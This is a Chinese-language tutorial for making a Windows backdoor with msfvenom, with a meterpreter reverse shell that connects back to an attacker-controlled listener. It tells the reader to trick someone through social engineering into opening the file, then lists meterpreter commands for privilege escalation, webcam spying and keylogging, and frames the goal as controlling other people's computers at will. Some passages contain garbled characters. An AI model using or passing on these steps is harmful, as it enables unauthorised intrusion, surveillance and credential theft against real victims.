1、首先在kali上制作一个后门程序。文件名为:openme.exe命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe#本地监听地址及端口号:10.10.10.128:50000
2、为生成的文件openme.exe赋予可执行的权限,如果有必要可以对该文件执行免杀命令:chmod 777 openme.exe
3、打开msf,加载exploit/multi/handler模块,同时设置本地主机地址,本地端口命令:msfconsole msf > use exploit/multi/handlermsf exploit(handler) > set lhost 10.10.10.128msf exploit(handler) > set lport 50000
4、开始执行渗透攻击并监听命令:msf exploit(handler) > exploit -z -j
5、此时,你可以将文件发给其他人,利用社会工程学知识让别人在他的win7系统上打开该文件,那么你的目的就达到了下面就是我在win7虚拟机中的文件,然后运行该文件
6、后门程序反向连接到msf,ms酆璁冻嘌f发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。如图你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell,还有session信息。命令:msf exploit(handler) > sessionsmsf exploit(handler) > sessions -i 1meterpreter > shell
7、最后恭喜你就这样hacked别人的嘛术铹砾win7系统,如果你进一步学习Windows系统下的命令行操作,你就可以随意控制别人的主机了。下面附上meterpreter常用的命令getsystem #会自动利用各种各样的系统漏洞来进行权限提升migrate #进程id进程迁移background #把当前的会话设置为背景,需要的时候在启用getuid #查看对方正在运行的用户ps #列出所有的进程getpid #返回运行meterpreter的id号sysinfo #产看系统信息和体系结构shell #切换到cmd的系统权限方式exit #退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口run webcam -p /var/www #在/var/www目录监控目标主机的摄像头keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘